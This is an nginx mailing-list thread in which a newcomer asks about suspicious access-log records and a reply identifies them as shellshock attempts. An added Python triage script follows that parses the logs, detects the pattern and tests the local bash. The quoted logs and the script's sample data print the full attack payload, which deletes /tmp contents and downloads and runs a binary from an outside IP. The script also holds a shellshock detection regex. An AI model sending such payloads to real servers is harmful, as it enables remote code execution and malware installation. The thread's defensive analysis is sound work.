Suspicious log records

Robert Paprocki rpaprocki at fearnothingproductions.net
Sat Oct 22 16:57:03 UTC 2016


Looks like a shellshock attempt. Provided that you're running a modern version of bash there's nothing to be done. Well, you could drop requests from those IPs if you see fit. 

Welcome to the wild world of running a public server!

> On Oct 22, 2016, at 03:19, janro <nginx-forum at forum.nginx.org> wrote:
> 
> Hi everyone.
> 
> I'm a newbie with Nginx and with servers and I thought to ask your opinion
> about the log input I noticed from last night.
> 
> There's clearly some sort of malicious attempt in access.log which is
> repeated four times. In error.log there are only 'closed keepalive connection'
> records, which match those four attempts.
> 
> Everything runs fine on the server side. I'd just like to know: is this just a
> normal day in the world of server logs, or something critical that needs
> action?
> 
> Access.log
> 
> 61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
> chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> 61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> 61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> 61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo
> /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
> >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
> /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo /tmp/China.Z-xxmb  >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> Error.log
> 
> 2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
> keepalive connection
> 
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472
> 
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
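The records above are the CVE-2014-6271 ("shellshock") pattern: the Referer and User-Agent headers start with the `() { :; };` function-definition prefix, followed by a command that would fetch a binary from the attacker's host and run it out of /tmp. nginx itself never hands request headers to a shell, so the payload only matters if something behind nginx (a CGI wrapper, a script that shells out with the header in its environment) passes them to an unpatched bash. Two things a practitioner would want from such a log: the list of source IPs and download URLs to block or hunt for, and confirmation that the local bash is patched. The script below is an added example, not code from the thread or from nginx; it parses the "combined" log format, reverses nginx's `\xNN` escaping (nginx writes `"` as `\x22` and non-printable bytes as `\xNN`, which is why the log lines look the way they do), flags any field carrying the shellshock prefix, and runs the standard environment-variable probe against the installed bash. The helper names and the two sample log lines are mine; the samples are constructed to mirror the post's records.

```python
"""Shellshock (CVE-2014-6271) triage for nginx access logs.

Added example, not part of the original thread. SAMPLE_LOG is constructed to
mirror the records in the post; the function names are my own.
"""
import re
import shutil
import subprocess
from collections import Counter

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "user-agent".
# nginx escapes a literal double quote as \x22, so [^"]* is safe for each quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The function-definition prefix that unpatched bash imports from any env var.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\};')
URL_RE = re.compile(r'https?://[^\s"\'\\;]+')

SAMPLE_LOG = [
    # Constructed: shellshock payload in both Referer and User-Agent, as in the post.
    '61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 '
    '"() { :; }; /bin/bash -c \\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 '
    '-O /tmp/China.Z-axgfh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\x22" '
    '"() { :; }; /bin/bash -c \\x22wget http://123.249.7.198:8832/1 -O /tmp/China.Z-axgfh\\x22"',
    # Constructed: an ordinary request for contrast.
    '192.0.2.10 - - [22/Oct/2016:00:15:00 +0300] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
]


def unescape_nginx(s):
    """Reverse nginx's \\xNN escaping of quotes, backslashes and non-printable bytes."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), s)


def parse_line(line):
    """Return the combined-format fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    for field in ('request', 'referer', 'ua'):
        rec[field] = unescape_nginx(rec[field])
    return rec


def find_shellshock(lines):
    """One hit per field (request, referer, ua) that carries the shellshock prefix."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ('request', 'referer', 'ua'):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    'ip': rec['ip'],
                    'field': field,
                    'status': rec['status'],
                    # Second-stage download URLs: what to block egress to and hunt for.
                    'urls': sorted(set(URL_RE.findall(rec[field]))),
                })
    return hits


def block_list(hits):
    """Source IPs to drop, most active first (the reply's optional mitigation)."""
    return [ip for ip, _ in Counter(h['ip'] for h in hits).most_common()]


def bash_is_vulnerable():
    """Run the classic CVE-2014-6271 probe against the installed bash.

    Returns True if bash imported the function from the env var and ran the
    trailing command, False if patched, None if no bash is installed.
    """
    bash = shutil.which('bash')
    if bash is None:
        return None
    env = {'x': '() { :;}; echo vulnerable', 'PATH': '/usr/bin:/bin'}
    out = subprocess.run([bash, '-c', 'echo test'], env=env,
                         capture_output=True, text=True).stdout
    return 'vulnerable' in out


if __name__ == '__main__':
    hits = find_shellshock(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']} {h['field']:8} status={h['status']} urls={h['urls']}")
    print('drop:', block_list(hits))
    print('local bash vulnerable:', bash_is_vulnerable())
```

Point it at a real file with `find_shellshock(open('/var/log/nginx/access.log'))`. The 301 status in the post is worth noting: the request hit nginx's redirect, never a backend, so the header was logged and discarded. A hit with a 200 on a path that reaches a CGI or script handler is the case worth investigating, and `bash_is_vulnerable()` returning True on that host means the payload could have run.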
